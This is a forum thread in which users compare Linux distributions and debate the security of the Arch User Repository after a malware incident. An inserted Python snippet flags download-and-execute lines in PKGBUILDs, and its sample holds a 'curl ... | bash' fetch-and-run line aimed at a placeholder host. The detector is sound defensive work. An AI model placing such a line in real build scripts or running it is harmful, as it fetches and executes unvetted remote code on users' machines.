Depends on your needs
jonii25755yDon't think you can just compare them like that.
Depends on your needs and experience.
eemed25yI've tried them all and am now using xubuntu. It's nice that everything just works out of the box.
Linux Mint Cinnamon.
aadilp12945yUbuntu works for me. Haven't tried anything else but I can say that Ubuntu doesn't give you too many problems.
I'm not sure about the default settings of mint.
But some pretty important points for Linux on SSDs are:
1. don't use a swap-partition.
Swap is used to write some of your memory to storage.
The frequent write-read-cycles can easily kill some SSDs.
2. tmpfs as /tmp
Linux will write temporary files to /tmp. Here the stuff with read-write-cycles also applies.
It's recommended to mount a tmpfs partition, that will use a part of your ram, in /tmp.
3. Deactivate Read-Access-Timestamp
By default, Linux will write the last time someone accessed a file to the file's metadata.
Again, frequent read-write-cycles.
To prevent this, one has to add the option "noatime" to the lines of your mounted partitions in /etc/fstab.
Elementary OS is based upon Ubuntu. But it has its own user interface, Pantheon, that is very similar to Mac OS. Although it is based on Ubuntu, it is much less bulky than Ubuntu.
djlazz313895yI'm not that much of a Linux guy yet, I've wanted to try to use it, but for now my favorite Linux distro is Android 😂
I would prefer for elements
4. Gentoo √
hasu24095yUbuntu. It's easy to get into and not such a pain like arch.
Also it runs ros :3
Fedora because foss and stable
@EvilArcher i'd love your opinion on the AUR problem related to my earlier comment.
Just interested to know how you tackle this without busting your time too much..
Wack64125y@Kanna if you want to start with a linux distro, I'd personally recommend Ubuntu.
Make sure to use an LTS (Long Time Support) version (the current is 18.04 and the next will be 20.04). With them you'll get updates for a long time as updating can sometimes break things.
Start with the GUI based stuff and just do what you can with the terminal. Try out stuff. At some point you'll do a lot of things in the terminal.
Once you know your way around, try other distros or replace parts of the system, for example get rid of gnome and use another DM, or try another distro.
That's what I would do.
Potato OS. It's stable as the earth.
Ubuntu has a wide user community in Germany. And seems worldwide pretty accepted.
Arch users just want it the hard way. It's cool but nothing for people not having built their proper compile yet.
And the other one. Guess it's a question of looks.
Well. They're exchangeable and modifiable. Most of all.
Ubuntu now offers the minimal installation. And dual boot with windows works like a charm. So the minimal 'd be my next pick. Which is a step further to Arch one day.. Buuut. Butt.
tarkanou265yXubuntu anytime of the day.
Ubuntu is stable which is a +
But it has too much bloat in my humble opinion.
I like arch but the downside is a rolling distro. Occasionally a bug passes through. While it's always solvable, it's a nuisance when a bug arises while working.
Fedora is sponsored by red hat.
It does a few things a bit different but once you know how fedora works it's rock solid.
I heard good things about open suse but haven't tried it.
If you want to learn the ins and outs of Linux, start with arch; everything is on the wiki page and it is one of the best Linux resources out there.
After that you can go onto Gentoo if you want to delve deeper
@bioDan So, how is it an arch issue? The malware has been removed after being reported. Same as with any other user repository, be it Google Play Store, Microsoft Store, or even GitHub, you shouldn't just blindly trust everyone. Some people will target the maintainers of software you want to use. Hell, at the top of https://aur.archlinux.org there is written, in bold, "DISCLAIMER: AUR packages are user produced content. Any use of the provided files is at your own risk".
Also the article in the rant you linked comes from Sophos blog, so I'm guessing Sophos is just trying to drive installs of its antivirus by spreading panic.
@SgnfcntOverflow although I had trouble following the coherency in the last comment, allow me to respond.
1. Sophos is more of a firewall than an anti-virus today. It's true that Sophos has been around much more time than Arch Linux (Sophos did start as an antivirus in about 1985 but since 2000+- it's primarily a firewall). I hope you don't think it's the same thing. Moreover, it's the oldest, best and probably most popular firewall for GNU Linux distros. So they are well established in the security world for many years now.
2. How is this an Arch issue? Well.. It's the Arch User Repository. If you can't trust packages that come from there, maintaining your system over time will become hell.
And No. To the best of my knowledge appstore/google play DO NOT have malware. Some apps may have tracking cookies, some other apps may steal some personal information. But you can be sure that there IS NO TROJAN HORSE TO TURN YOUR DEVICE TO A ZOMBIE BOT.
3. Oh they fixed it? Good. You have nothing to worry about :)
(until some C&C center will give the signal and your computer will rise from null)
1. I was talking about "Antivirus for Linux" advertised right under article, but yeah, I take that back.
2. Still not seeing it as an Arch issue. You are supposed to read PKGBUILDs before installing packages. If you don't then it's your fault when you install malware, because arch team across all sites mentioning aur explicitly warns you that aur is not official and should be used at your own risk. If you want officially maintained packages then use arch repository (see the lack of user?).
As for malware on Play Store:
So no, software distribution platforms with third-party content are not safe.
3. I don't really know what you expect them to do. Hack the C&C server to purge malware from infected computers? Because in my opinion they've taken enough steps to prevent this malware from spreading by reverting the changes to PKGBUILD as soon as they were discovered, suspending account from which changes originated and acknowledging the issue on aur-general mailing list. There is no way that they could force the removal of malicious packages from affected computers.
@PrivateGER lol I've done that shit a couple of times. Those shady apps are much more about bad/incomplete code than actual malware. When it comes to malware, from my experience, it comes down to gather personal information or monetizing from advertising.
Which of course is BAD but not as bad as a trojan or backdoor.
@SgnfcntOverflow thanks for your reply. Please allow me to respond.
1. Ok. Cool :)
2. I almost completely agree with what you wrote here. There is no 100% security guarantee for any system, be it in the digital realm or the natural realm.
But you didn't take into account these differences when you were making the comparison:
- the workload for each repository: Play store is for Android/Chromium devices with hundreds of millions (if not more) users, against AUR (probably a couple of hundred thousand users, I really don't know and don't plan to check)
- Device type: Play store is more phone/tablet oriented whilst AUR is desktop/laptop oriented.
- Target users: Android is for the general public. AUR is for tech enthusiasts.
3. I expect them to have a more rigorous process of validating packages, whether new/updated, before publishing them to the masses.
I mean, I'm glad they took some measurements for containing and removing the problem. But they wouldn't be in that situation to begin with if security was one of their most primal concerns. Which obviously wasn't.
Of course they can still improve and make it better, and as an Arch enthusiast yourself I bet you can contribute plenty :)
I'll allow myself for a little renumbering, hope you don't mind :)
1. Regarding workload: Google has a lot bigger budget to address the issue. It also requires registration fee per every user who wants to submit software. To my knowledge aur is not moderated by arch developers but by "Trusted Users" which have been chosen in democratic vote by current TUs. There are around 50 TUs currently, which, compared to multitude of paid Google employees, is nothing. Also (basing on data from statista.com) there are 3.3 million apps on Play Store, while there are 47831 packages in AUR. So Google has to validate only around 70 times more packages.
2. Target users: Arch being targeted at tech enthusiasts actually means that they are more likely to check what they are installing. And in this case this helped spot and remove the malware within a few hours from being added to PKGBUILD.
3. Device type: I'm pretty sure Microsoft Store faces the same issue from time to time so it's not limited to phone/tablet.
4. Now, don't get me wrong, I don't mean that it's okay to have some vulnerabilities if others have them. But AUR is not an official repository even if it has Arch in name. Official arch repos are inherently more secure because they are approved by arch maintainers.
5. Security measures: It is not an arch issue. It's AUR issue and it's one of the reasons why AUR should be used with caution, preferably by tech-savvy users. Pre-validated (by TUs) packages from AUR can be found in community repository, which is regarded as more secure than AUR. Of course they could deploy some script which would check the PKGBUILD but that wouldn't help much.
Google has a big advantage here, because they store packages on their servers and can validate them once when they are uploaded. AUR build scripts, on the other hand, pull the source-code from third-party servers. This makes it a lot harder to validate the package while allowing people to share their work as easily as it is now. Said 3rd-party servers or developers' account (along with their keys) may be hijacked, and there is no way to check for that scenario.
Also, sorry for the wall of text. :(
@SgnfcntOverflow thanks for your response. I allowed myself to respond according to the new numbering system. My response comes after the '-' character.
Please let me know if the quotes don't accurately summarize your points:
1. 'Google has to validate "only" 70 times more than AUR.' - 70 times more means a lot more. Especially since there's a non-linear relation between different apps. (Checking 1 well developed game might take much longer than 10 clock apps)
2. 'Arch users are supposed to be more tech-savvy.' - I'm a pro in blaming the user :)
3. 'Device type doesn't matter.' - depends on the level of analysis. Since we are talking about security, I actually think it does. Although there are many similarities, the development environment is still a laptop/desktop/server and not a phone/tablet.
4. 'AUR is not an official repository' and
5. 'Arch is not AUR' - Both true.
But it does come pre-installed with the Arch image and it is recommended to use it (But with care! *wink wink*)
'Google has an edge over Arch' - in many cases yes, but Google also has much bigger problems that Arch doesn't have to deal with.
'There is no way to check for that scenario :(' - If that's true, then it's a bad architectural design to begin with.
But I believe there are many levels the problem can be solved.
For instance, slowing the flow of deployment of new packages so that there will be more time for validation and inspection of each package before committing it to the repository. Maybe a more strict methodology like debian/ubuntu or fedora/centos.
Anyway, I feel like we both have our minds made up but I still want to thank you for this conversation.
Arch. Or Darwin haha.
@bioDan Well, I have to thank YOU, as I'm really enjoying this discussion. We have, however, kind of, hijacked this thread.
1. I have to acknowledge that it indeed is a lot bigger library. :)
3. I didn't necessarily mean that device type doesn't matter but rather that it happens on other desktop platforms too, for example Windows (though I don't know if anyone actually uses Microsoft Store). I believe malware has also made it to Ubuntu Snap Store which I think is bundled with newest Ubuntu releases.
4, 5. AUR wrappers don't come pre-installed with pure Arch. Without them installation from AUR requires downloading PKGBUILD and then building with it, and that makes omitting the step of viewing the build script harder. Not displaying PKGBUILD would be deliberately ignoring security by user.
I don't think Arch should be dismissed from distro discussions just because of aur security flaws, as aur is not essential for Arch usage. And those flaws can be overcome by adhering to good advice of checking what you are installing. AUR allows for easier and faster adoption of software but it also requires the users to actually know what they are doing.
On one hand, aur could be adding a note saying that PKGBUILD was not validated unless it got, let's say 10 positive reviews from other maintainers, but on the other hand it would discourage users from validating build scripts themselves.
I don't think that debian, fedora, arch or aur way is perfect. But they all have their audiences and arch can be successfully used without taking the risks of using aur.
@SgnfcntOverflow I'm enjoying our discussion as well 👍
and I agree this post was hijacked but I don't think OP minds, nevertheless I respect your opinion and I agree that Arch shouldn't be dismissed.
But it also shouldn't be put on an altar as the best linux distro or even in the top 3 (in my truly humble opinion).
That being said i love the educational purpose behind it and the fact that it attracts new users to the Linux world.
But using it in production as a server.. Idk, probably someone here has more experience than me as a system-enginee*AHEM* devOps. ( @Bitwise ?)
@Bitwise thanks for your input man! I'm totally with you on the blaming-the-user for-misusing-the-system wagon.
But you can probably say this commit should never enter to production in the Play store (Red Hat distros, Ubuntu, or Debian, etc..) packet managers:
(Notice the last curl addition in the end)
I understand the comparison you make for the AUR not being the official repo for Arch, you do have a point there. and kudos to them for containing and fixing the problem.
But it still is widely used by the "careless" user as it comes pre-installed with the system (unlike the others i mentioned above).
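The PKGBUILD review step argued over in the comments above (reading the build script before building, and spotting a `curl` line appended at the end) can be partly automated. The following is an added example, not part of the thread or of any Arch tooling: a small Python check that flags lines in a PKGBUILD or `.install` script that download content and hand it to a shell. The sample PKGBUILD, its `example.invalid` URLs and the function names are constructed for illustration.

```python
import re

# Heuristics for "download and execute" in a build script. They are a
# reviewer's aid, not a verdict: a clean result does not make a package safe.
RULES = [
    ("pipe-to-shell", re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z|da)?sh\b")),
    ("shell-from-substitution", re.compile(r"\b(ba|z|da)?sh\b.*(\$\(|<\(|`)\s*(curl|wget)\b")),
]

def logical_lines(text):
    """Yield (first_line_no, joined_line), merging backslash continuations."""
    buf, start = "", None
    for no, raw in enumerate(text.splitlines(), 1):
        start = start or no
        if raw.rstrip().endswith("\\"):
            buf += raw.rstrip()[:-1] + " "
            continue
        yield start, buf + raw
        buf, start = "", None
    if buf:
        yield start, buf

def review(text):
    """Return [(line_no, rule_name, line)] for lines a human should read first."""
    findings = []
    for no, line in logical_lines(text):
        code = line.strip()
        if not code or code.startswith("#"):
            continue  # skip blanks and whole-line comments
        for name, rx in RULES:
            if rx.search(code):
                findings.append((no, name, code))
                break
    return findings

# Constructed sample: an ordinary PKGBUILD with one appended fetch-and-run line.
SAMPLE = '''pkgname=example-tool
pkgver=1.0
source=("https://example.invalid/example-tool-$pkgver.tar.gz")
# curl https://example.invalid/notes | sh   (comment, ignored)
package() {
  install -Dm755 example-tool "$pkgdir/usr/bin/example-tool"
}
curl -s https://example.invalid/x \\
  | bash -s
'''

if __name__ == "__main__":
    print(*review(SAMPLE), sep="\n")
```

A check like this only catches the obvious pattern; it does not inspect what the `source=` URLs actually serve, which is the harder problem raised earlier in the thread.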
SuryaK14305yYou can't compare operating systems. Each have their unique property designed to satisfy the needs of the...... Arch